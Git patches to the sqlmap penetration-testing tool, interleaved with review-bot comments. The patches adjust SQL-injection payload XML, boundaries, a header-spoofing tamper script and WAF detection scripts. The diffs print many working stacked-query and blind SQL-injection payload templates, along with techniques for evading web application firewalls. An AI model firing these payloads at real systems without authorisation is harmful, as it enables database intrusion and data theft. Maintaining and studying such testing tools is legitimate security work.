@@ -61,7 +61,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -7b2a20d7f149cc2522275e5df23bdc54 lib/parse/cmdline.py +fc5a42940327dd3f40a780c865b6b136 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -84f9cb02454fa21a619ccd2b3fd294d4 lib/request/connect.py +b744d840de253c05e808a72d6d11dc5d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 35d9ed84769111738bb817e0914b01c559b7b82b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Sep 2018 10:30:58 +0200 Subject: [PATCH 283/428] Cleaning a mess with stacked queries and pre-WHERE boundaries --- lib/core/settings.py | 2 +- lib/parse/payloads.py | 4 ++ txt/checksum.md5 | 10 ++--- xml/boundaries.xml | 36 +++++++++++++++++ xml/payloads/boolean_blind.xml | 18 ++++----- xml/payloads/stacked_queries.xml | 68 ++++++++++++++++---------------- 6 files changed, 89 insertions(+), 49 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6a133d608e9..cdb05523a55 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.22" +VERSION = "1.2.9.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index ee4d8573d13..6ea796060a0 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -6,6 +6,7 @@ """ import os +import re from xml.etree import ElementTree as et @@ -17,6 +18,9 @@ from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + if tag in ("clause", "where"): text = text.split(',') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7cdd4e99d57..0dd04c2cd66 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1778dd902fbe5392377fd9b723898bbb lib/core/settings.py +4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py 
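Review bot: The range expansion added to cleanupVals silently yields an empty string for a descending or degenerate range such as `9-1`, because `xrange(9, 2)` is empty, and that empty token then reaches the `text.split(',')` below as a `''` entry instead of the payload file being reported as malformed. The payload XML ships with the project, so this is an authoring error rather than an attack surface, but it should still fail loudly where it happens rather than downstream; a named inner function that validates the bounds replaces the lambda cleanly, and the `'-' in text` pre-check becomes redundant once re.sub does the matching. Note also that only `clause` gets the expansion while `where` is still split from a plain comma list two lines below — presumably intentional, but worth a comment. cleanupVals's body continues past the end of this hunk.
```python
def cleanupVals(text, tag):
    if tag == "clause":
        def _expand(match):
            # "1-8" -> "1,2,...,8"; reject a descending range instead of
            # silently expanding it to nothing (xrange(9, 2) is empty)
            start, stop = int(match.group(1)), int(match.group(2))
            if start > stop:
                raise ValueError("invalid clause range '%s' in payload XML" % match.group(0))
            return ','.join(str(_) for _ in xrange(start, stop + 1))

        text = re.sub(r"(\d+)-(\d+)", _expand, text)

    # … unchanged: comma split of clause/where lists …
```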
@@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py +f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py @@ -471,13 +471,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml +3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml +1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml -3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml +82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 8f2351412bb..857551e6bbe 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml 
@@ -413,6 +413,42 @@ Formats: '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )+' + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 00ba460f69b..7b9e5b46ee1 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -1386,7 +1386,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1407,7 +1407,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1428,7 +1428,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) @@ -1449,7 +1449,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 @@ -1469,7 +1469,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] @@ -1491,7 +1491,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) @@ -1513,7 +1513,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL @@ -1533,7 +1533,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;IIF([INFERENCE],1,1/0) @@ -1553,7 +1553,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END diff --git a/xml/payloads/stacked_queries.xml b/xml/payloads/stacked_queries.xml index 2ecd2ef49b8..1471df7d057 100644 --- a/xml/payloads/stacked_queries.xml +++ b/xml/payloads/stacked_queries.xml 
@@ -7,7 +7,7 @@ 4 2 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -28,7 +28,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -48,7 +48,7 @@ 4 3 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -69,7 +69,7 @@ 4 4 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -89,7 +89,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -109,7 +109,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -128,7 +128,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -149,7 +149,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -169,7 +169,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -189,7 +189,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -208,7 +208,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -230,7 +230,7 @@ 4 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -251,7 +251,7 @@ 4 1 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -273,7 +273,7 @@ 4 4 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -294,7 +294,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL 
@@ -314,7 +314,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -333,7 +333,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -353,7 +353,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -372,7 +372,7 @@ 4 4 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -392,7 +392,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -411,7 +411,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -431,7 +431,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -450,7 +450,7 @@ 5 3 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -470,7 +470,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -489,7 +489,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -510,7 +510,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -530,7 +530,7 @@ 4 4 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE 
@@ -551,7 +551,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -571,7 +571,7 @@ 5 4 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -591,7 +591,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -610,7 +610,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -631,7 +631,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -651,7 +651,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END @@ -672,7 +672,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END From a8a7dee8003eb71c9570bd546dbb2d38085514e5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 15 Sep 2018 21:36:21 +0200 Subject: [PATCH 284/428] Fixes #3239 --- lib/core/settings.py | 2 +- tamper/xforwardedfor.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cdb05523a55..816e03770f6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.23" +VERSION = "1.2.9.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index f4cdda1140a..e14b4909260 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -25,6 +25,6 @@ def tamper(payload, **kwargs): headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() - headers["X-Clinet-Ip"] = randomIP() + headers["X-Client-Ip"] = randomIP() headers["X-Real-Ip"] = randomIP() return payload diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0dd04c2cd66..daefafdcef8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py +018e7c47d53529bd5a3eab2e3405436c lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py 
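Review bot: The header-name fix is correct, but `headers = kwargs.get("headers", {})` on the line above it means that when no `headers` dict is supplied the three assignments land in a throwaway dict and `tamper` still returns `payload` unchanged, so the script silently does nothing. Presumably every caller passes the shared dict; if so a docstring line such as `Requires the caller to pass the shared 'headers' dict via kwargs; the extra headers are applied in place.` would make that contract explicit. The docstring itself lies outside the hunk.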
@@ -286,7 +286,7 @@ cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -23d845e9f937f2a31c43767b8a8fcff6 tamper/xforwardedfor.py +bb87c2c0ec66927015c9709aaaf93561 tamper/xforwardedfor.py 1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py From 2d2b20344d57be1a1e6aa9ea2d60542d731429db Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 15 Sep 2018 23:17:32 +0200 Subject: [PATCH 285/428] Minor patch for bigip WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/bigip.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 816e03770f6..b12549a1fde 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.24" +VERSION = "1.2.9.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index daefafdcef8..e9eb6c16fd5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-018e7c47d53529bd5a3eab2e3405436c lib/core/settings.py
+94b6f9ade36d5622998a480dcea19946 lib/core/settings.py
 dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 248bd121e0565318e1efaff54aa427bc lib/core/target.py
@@ -400,7 +400,7 @@ b61329e8f8bdbf5625f9520ec010af1f waf/armor.py
 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py
 ef722d062564def381b1f96f5faadee3 waf/baidu.py
 07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py
-82efee4639f7be75041c0145a6bc8578 waf/bigip.py
+44f724ab7d333397975fecdf7e50be56 waf/bigip.py
 6a2834daf767491d3331bd31e946d540 waf/binarysec.py
 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py
 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py
diff --git a/waf/bigip.py b/waf/bigip.py
index 82a39a7978c..9cc248a8003 100644
--- a/waf/bigip.py
+++ b/waf/bigip.py
@@ -19,7 +19,7 @@ def detect(get_page):
 _, headers, code = get_page(get=vector)
 retval = headers.get("X-Cnection", "").lower() == "close"
 retval |= headers.get("X-WA-Info") is not None
- retval |= re.search(r"\ATS\w{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
+ retval |= re.search(r"\bTS[0-9a-f]+=", headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None
 retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
 retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
 retval |= re.search(r"\AF5\Z", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
From ca9a56c0ff38d97ab329c32b13b2a79f08e389c7 Mon Sep 17 00:00:00 2001
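Review bot: The new Set-Cookie pattern `\bTS[0-9a-f]+=` drops the `re.I` flag that the old `\ATS\w{4,}=` carried, so a cookie name with uppercase hex no longer matches, and the former minimum of four characters is gone so a name as short as `TS1=` now counts as a hit. If lowercase-only hex is the intended fingerprint (presumably the BIG-IP persistence cookie), a comment on that line recording the expected shape would stop a later reader from re-adding the flag; otherwise `[0-9a-fA-F]+` restores the earlier tolerance. The loop that binds `vector` starts outside the hunk.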
From: Miroslav Stampar Date: Sat, 15 Sep 2018 23:27:24 +0200 Subject: [PATCH 286/428] Minor update of WebKnight WAF script --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/webknight.py | 3 ++- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b12549a1fde..eb83b3c2f46 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.25" +VERSION = "1.2.9.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e9eb6c16fd5..affd4e154e4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -94b6f9ade36d5622998a480dcea19946 lib/core/settings.py +1d4a4c8a47f7d7ce2b5fa59548e84bc5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -455,7 +455,7 @@ a687449cd4e45f69e33b13d41e021480 waf/uspses.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py -5b1eefdc39d449a74fce0564364b0e09 waf/webknight.py +6802052ddae241e2f4f78974ed11904a waf/webknight.py 11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py diff --git a/waf/webknight.py b/waf/webknight.py index ed9247bdd0e..54abfa8aca4 100644 
--- a/waf/webknight.py
+++ b/waf/webknight.py
@@ -16,9 +16,10 @@ def detect(get_page):
 retval = False
 for vector in WAF_ATTACK_VECTORS:
- _, headers, code = get_page(get=vector)
+ page, headers, code = get_page(get=vector)
 retval = code == 999
 retval |= re.search(r"WebKnight", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+ retval |= any(_ in (page or "") for _ in ("WebKnight Application Firewall Alert", "AQTRONIX WebKnight"))
 if retval:
 break
From 3e72da66f9408de4dc44060f50cffb33fd7b9e44 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 18 Sep 2018 16:45:08 +0200
Subject: [PATCH 287/428] Minor update (preventing WAF specific response reports on generic 403)
---
 lib/controller/checks.py | 2 +-
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 56351fd8c3d..f96a63f307c 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1450,7 +1450,7 @@ def _(*args, **kwargs):
 retVal.append(product)
 if retVal:
- if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
+ if kb.wafSpecificResponse and "You don't have permission to access" not in kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
 handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
 os.close(handle)
 with openFile(filename, "w+b") as f:
diff --git a/lib/core/settings.py b/lib/core/settings.py
index eb83b3c2f46..656274b857d 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.9.26"
+VERSION = "1.2.9.27"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
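Review bot: The added `any(...)` line in waf/webknight.py binds `_` as a meaningful comprehension variable, which clashes with the throwaway use of `_` on the removed line just above it, and `page or ""` is re-evaluated for every marker. A clearer form is `retval |= any(marker in (page or "") for marker in ("WebKnight Application Firewall Alert", "AQTRONIX WebKnight"))`. The substring test is also case-sensitive while the Server-header check on the preceding line uses `re.I`; if that asymmetry is deliberate a short comment would save the next reader from "fixing" it. The return of detect() is outside the hunk.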
